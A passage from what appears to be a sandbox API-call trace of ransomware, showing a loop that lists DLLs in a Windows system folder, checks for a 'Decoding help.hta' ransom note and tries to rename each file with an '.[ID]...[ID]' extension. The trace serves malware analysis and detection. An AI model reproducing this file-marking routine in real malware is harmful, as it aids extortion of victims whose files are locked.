(in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.016] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcf.dll") returned -1 [0059.016] lstrlenW (lpString="msadcf.dll") returned 10 [0059.016] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.016] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadcf.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" [0059.016] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" [0059.016] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.016] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c41364, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb0c41364, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5f926f50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcfr.dll", cAlternateFileName="")) returned 1 [0059.016] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.016] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.017] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcfr.dll") returned -1 [0059.017] lstrlenW (lpString="msadcfr.dll") returned 11 [0059.017] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.017] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.017] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadcfr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" [0059.017] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" [0059.017] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.017] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b79e8a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92b79e8a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b9ffeb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x34000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0059.017] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.017] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.017] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.017] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadco.dll") returned -1 [0059.017] lstrlenW (lpString="msadco.dll") returned 10 [0059.017] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.017] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.017] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadco.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" [0059.017] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" [0059.017] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.018] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e0a3d8, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb0e0a3d8, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5fa0a020, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0059.018] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.018] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.018] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.019] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcor.dll") returned -1 [0059.019] lstrlenW (lpString="msadcor.dll") returned 11 [0059.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.019] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadcor.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" [0059.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" [0059.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.019] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad9d263, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ad9d263, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad9d263, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcs.dll", cAlternateFileName="")) returned 1 [0059.019] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.019] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.019] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcs.dll") returned -1 [0059.019] lstrlenW (lpString="msadcs.dll") returned 10 [0059.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.019] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadcs.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" [0059.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" [0059.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.020] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8098396, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb8098396, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9b60d700, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0059.020] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.020] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.020] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadds.dll") returned -1 [0059.020] lstrlenW (lpString="msadds.dll") returned 10 [0059.020] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.020] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadds.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" [0059.020] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" [0059.020] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.020] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0fd344c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb0fd344c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5fb141f0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0059.020] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.020] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.021] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msaddsr.dll") returned -1 [0059.021] lstrlenW (lpString="msaddsr.dll") returned 11 [0059.021] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.021] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msaddsr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" [0059.021] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" [0059.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.022] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1091b27, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb1091b27, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x60936490, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0059.022] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.022] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaprsr.dll") returned -1 [0059.022] lstrlenW (lpString="msdaprsr.dll") returned 12 [0059.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msdaprsr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" [0059.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" [0059.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.022] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: 